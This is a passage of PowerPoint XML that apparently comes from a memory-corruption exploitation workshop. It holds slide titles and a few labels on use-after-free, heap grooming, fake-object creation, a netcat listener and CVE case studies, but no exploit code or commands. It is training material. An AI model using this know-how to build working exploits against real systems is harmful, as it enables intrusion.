      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1397931F-80D5-1C48-AB9A-AFB33230F2EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1102936"/>
            <a:ext cx="4252404" cy="3963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UAF (victim) chunk corrupts another object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212595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B2A-1853-DC4C-8F91-DA7FFFFD7CD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UAF – Solution Diagram (Review)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F271F73-3DDC-104B-BA9C-1D75C1191326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1102936"/>
            <a:ext cx="4252404" cy="3963420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>New object corrupts UAF chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UAF chunk to corrupt new object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 6" descr="Diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6027753A-37CB-C244-A456-848AF8C1CDA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3290734"/>
            <a:ext cx="3886200" cy="1693157"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Table&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1B062E6-0C7D-E74D-BA47-2E2CA23614EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="3420"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3879542" y="1407944"/>
            <a:ext cx="5264458" cy="2411453"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCE510A5-A889-DC4B-86E1-20FB5A4374EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3435658" y="1473693"/>
            <a:ext cx="1402672" cy="23082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4765DC-F69C-1A4E-ADEA-04056496DA9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1467035" y="2319234"/>
            <a:ext cx="476065" cy="13294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0232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01FAACB-0A63-FA48-4D22-64DF8FE7C9C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The World is Your Oyster</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF76FDE7-0147-F04D-8D2F-015528EB7D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36" b="22422"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="628650" y="1236541"/>
            <a:ext cx="7886700" cy="3263504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3182915801"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="SI Presentation Template 201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 Presentation Template 2016" id="{4A944B32-5D56-4B66-9CCE-98342BECB114}" vid="{C7967BE2-A965-4679-84AD-C8DB6058DE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{CA71A65C-A00A-2747-A03F-77FB756D8FE5}tf10001057</Template>
  <TotalTime>14846</TotalTime>
  <Words>5443</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>966</Paragraphs>
  <Slides>139</Slides>
  <Notes>98</Notes>
  <HiddenSlides>32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139</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="145" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Avenir Book</vt:lpstr>
      <vt:lpstr>Avenir Medium</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Hack</vt:lpstr>
      <vt:lpstr>SI Presentation Template 2016</vt:lpstr>
      <vt:lpstr>Final Module</vt:lpstr>
      <vt:lpstr>Class So Far</vt:lpstr>
      <vt:lpstr>HTTP Server – From Scratch</vt:lpstr>
      <vt:lpstr>HTTP Protocol</vt:lpstr>
      <vt:lpstr>HTTP/1.1 Protocol From Afar</vt:lpstr>
      <vt:lpstr>HTTP – Line One </vt:lpstr>
      <vt:lpstr>HTTP – Headers</vt:lpstr>
      <vt:lpstr>HTTP – Body </vt:lpstr>
      <vt:lpstr>All Together</vt:lpstr>
      <vt:lpstr>Reponses</vt:lpstr>
      <vt:lpstr>Important Headers – 1 </vt:lpstr>
      <vt:lpstr>Important Headers – 2 </vt:lpstr>
      <vt:lpstr>List of Supported Headers</vt:lpstr>
      <vt:lpstr>List of Other Supported Things</vt:lpstr>
      <vt:lpstr>List of Non-Supported Things</vt:lpstr>
      <vt:lpstr>Start the Service</vt:lpstr>
      <vt:lpstr>Interact with the Server</vt:lpstr>
      <vt:lpstr>HTTP Request  </vt:lpstr>
      <vt:lpstr>HTTP Response – HTML </vt:lpstr>
      <vt:lpstr>Basic Review of Source Code</vt:lpstr>
      <vt:lpstr>How Does Header Parsing Work?</vt:lpstr>
      <vt:lpstr>Source Code Review</vt:lpstr>
      <vt:lpstr>Pattern Matching</vt:lpstr>
      <vt:lpstr>Use After Free Vulnerability</vt:lpstr>
      <vt:lpstr>Tracing a Use After Free – 1 </vt:lpstr>
      <vt:lpstr>Tracing a Use After Free – 2 </vt:lpstr>
      <vt:lpstr>Tracing UAF in Code Base</vt:lpstr>
      <vt:lpstr>Your Turn to Trace Bugs!</vt:lpstr>
      <vt:lpstr>Iterating Over res_header_lst</vt:lpstr>
      <vt:lpstr>Array Iteration – Bug 1 (serve_file) </vt:lpstr>
      <vt:lpstr>Array Iteration – Bug 2 (interpret_single_header) </vt:lpstr>
      <vt:lpstr>Array Iteration – Bug 3 (send_response) </vt:lpstr>
      <vt:lpstr>Array Iteration – Bug 4 (cleanup_response) </vt:lpstr>
      <vt:lpstr>Bug Recap</vt:lpstr>
      <vt:lpstr>How to Trigger? Bugs 1 &amp; 2</vt:lpstr>
      <vt:lpstr>How to Trigger? – Bug 3 </vt:lpstr>
      <vt:lpstr>How to Trigger? – Bug 4 </vt:lpstr>
      <vt:lpstr>Determining Exploitability</vt:lpstr>
      <vt:lpstr>res_header_lst – Diagram </vt:lpstr>
      <vt:lpstr>Routes - Diagram</vt:lpstr>
      <vt:lpstr>Exploitability</vt:lpstr>
      <vt:lpstr>Exploitability – Type Confusion</vt:lpstr>
      <vt:lpstr>Exploitability – Type Confusion</vt:lpstr>
      <vt:lpstr>Exploitability – Type Confusion</vt:lpstr>
      <vt:lpstr>Exploitability – Type Confusion</vt:lpstr>
      <vt:lpstr>Exploitability – Type Confusion</vt:lpstr>
      <vt:lpstr>Full Exploit Chain</vt:lpstr>
      <vt:lpstr>Info Leak</vt:lpstr>
      <vt:lpstr>Bug Classes</vt:lpstr>
      <vt:lpstr>Proper Way To Initialize Memory</vt:lpstr>
      <vt:lpstr>Example - BleedingTooth</vt:lpstr>
      <vt:lpstr>Uninitialized Memory Vuln Hunt</vt:lpstr>
      <vt:lpstr>Address Sanitizer (ASAN) </vt:lpstr>
      <vt:lpstr>Your Turn to Trace Bugs!</vt:lpstr>
      <vt:lpstr>Header Value Inside parse_single_header()</vt:lpstr>
      <vt:lpstr>Result of ASAN Read</vt:lpstr>
      <vt:lpstr>Uninitialized Information Leaks</vt:lpstr>
      <vt:lpstr>Query Value – /echo </vt:lpstr>
      <vt:lpstr>Reviewing the Small Bin/Unsorted Bin</vt:lpstr>
      <vt:lpstr>Leak Information for Bins</vt:lpstr>
      <vt:lpstr>Tracing Allocations</vt:lpstr>
      <vt:lpstr>Allocation/Freeing Primitives</vt:lpstr>
      <vt:lpstr>Parse URI Primitives</vt:lpstr>
      <vt:lpstr>parse_single_header Primitives</vt:lpstr>
      <vt:lpstr>Leak Strategy</vt:lpstr>
      <vt:lpstr>Leak Strategy #2</vt:lpstr>
      <vt:lpstr>Header Value Inside parse_single_header()</vt:lpstr>
      <vt:lpstr>Half Science – Half Art</vt:lpstr>
      <vt:lpstr>Your Turn to Groom!</vt:lpstr>
      <vt:lpstr>Thought #1</vt:lpstr>
      <vt:lpstr>Problem</vt:lpstr>
      <vt:lpstr>Use Allocation Primitives</vt:lpstr>
      <vt:lpstr>Large URL/Parameters = Groomed</vt:lpstr>
      <vt:lpstr>POC || GTFO</vt:lpstr>
      <vt:lpstr>Many Headers = Groomed</vt:lpstr>
      <vt:lpstr>Leak with Hexdump</vt:lpstr>
      <vt:lpstr>Next Steps</vt:lpstr>
      <vt:lpstr>Full Exploit Chain - UAF</vt:lpstr>
      <vt:lpstr>Tracing a Use After Free – 1 </vt:lpstr>
      <vt:lpstr>Your Turn to Use After Free!</vt:lpstr>
      <vt:lpstr>Interpret The Incoming Headers</vt:lpstr>
      <vt:lpstr>Connection Header</vt:lpstr>
      <vt:lpstr>Connection Header Creates UAF</vt:lpstr>
      <vt:lpstr>Proof of concept – HTML </vt:lpstr>
      <vt:lpstr>Proof of Concept Result (ASAN)</vt:lpstr>
      <vt:lpstr>Proof of Concept – Crash </vt:lpstr>
      <vt:lpstr>Proof of concept – HTML </vt:lpstr>
      <vt:lpstr>Double Free!</vt:lpstr>
      <vt:lpstr>UAF or DF? </vt:lpstr>
      <vt:lpstr>If All Techniques Fail?</vt:lpstr>
      <vt:lpstr>Living Off the Land</vt:lpstr>
      <vt:lpstr>What Makes a Good Object?</vt:lpstr>
      <vt:lpstr>timer_lst in Linux Networking</vt:lpstr>
      <vt:lpstr>CVE-2016-8655 Exploitation</vt:lpstr>
      <vt:lpstr>CVE-2017-6074 Exploitation</vt:lpstr>
      <vt:lpstr>UAF – Solution Diagram (Review)</vt:lpstr>
      <vt:lpstr>Fd Poison - Throwback</vt:lpstr>
      <vt:lpstr>UAF – Solution Diagram (Review)</vt:lpstr>
      <vt:lpstr>The World is Your Oyster</vt:lpstr>
      <vt:lpstr>Good Targets in HTTP Server?</vt:lpstr>
      <vt:lpstr>My Favorite Target</vt:lpstr>
      <vt:lpstr>Conceptual Plan – 1 </vt:lpstr>
      <vt:lpstr>Conceptual Plan – 2 </vt:lpstr>
      <vt:lpstr>Conceptual Plan – 3 </vt:lpstr>
      <vt:lpstr>Conceptual Plan – 4 </vt:lpstr>
      <vt:lpstr>UAF Solution Throwback</vt:lpstr>
      <vt:lpstr>Your Turn to Create Exploit Plan!</vt:lpstr>
      <vt:lpstr>Target Chunk – 0x30 TCache</vt:lpstr>
      <vt:lpstr>Conceptual Plan – 2 </vt:lpstr>
      <vt:lpstr>Target Allocation Requirements</vt:lpstr>
      <vt:lpstr>Conceptual Plan – 3 </vt:lpstr>
      <vt:lpstr>Host Setting</vt:lpstr>
      <vt:lpstr>Target Allocation Requirements</vt:lpstr>
      <vt:lpstr>Fake Object Creation - Alignments</vt:lpstr>
      <vt:lpstr>Conceptual Plan – 4 </vt:lpstr>
      <vt:lpstr>Fake Object Creation - Alignments</vt:lpstr>
      <vt:lpstr>What to Call?</vt:lpstr>
      <vt:lpstr>Fake Object Creation - Alignments</vt:lpstr>
      <vt:lpstr>Fake Object Creation - Alignments</vt:lpstr>
      <vt:lpstr>Netcat Listener</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Bonus Round!</vt:lpstr>
      <vt:lpstr>Number (Integer) Related Problems</vt:lpstr>
      <vt:lpstr>NSO iMessage Vulnerability – 1 </vt:lpstr>
      <vt:lpstr>NSO iMessage Vulnerability – 2 </vt:lpstr>
      <vt:lpstr>Integer Overflow in read_wrapper()</vt:lpstr>
      <vt:lpstr>Integer Overflow in add_string()</vt:lpstr>
      <vt:lpstr>Integer Overflow in add_string()</vt:lpstr>
      <vt:lpstr>How Is This Even Exploitable?</vt:lpstr>
      <vt:lpstr>How Is This Even Exploitable?</vt:lpstr>
      <vt:lpstr>How Is This Even Exploitable?</vt:lpstr>
      <vt:lpstr>Complexity of Exploit</vt:lpstr>
      <vt:lpstr>Many Ways to Exploit This!</vt:lpstr>
      <vt:lpstr>Fd Poison – Most Straight Forward</vt:lpstr>
      <vt:lpstr>Exploitable!</vt:lpstr>
      <vt:lpstr>Takeaways from the Workshop</vt:lpstr>
      <vt:lpstr>Want to Test Your New Skillz?</vt:lpstr>
      <vt:lpstr>What Next?</vt:lpstr>
      <vt:lpstr>This is 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Unlink</dc:title>
  <dc:creator>Microsoft Office User</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>370</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-01T21:54:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-06T04:43:01Z</dcterms:modified>
</cp:coreProperties>
</file>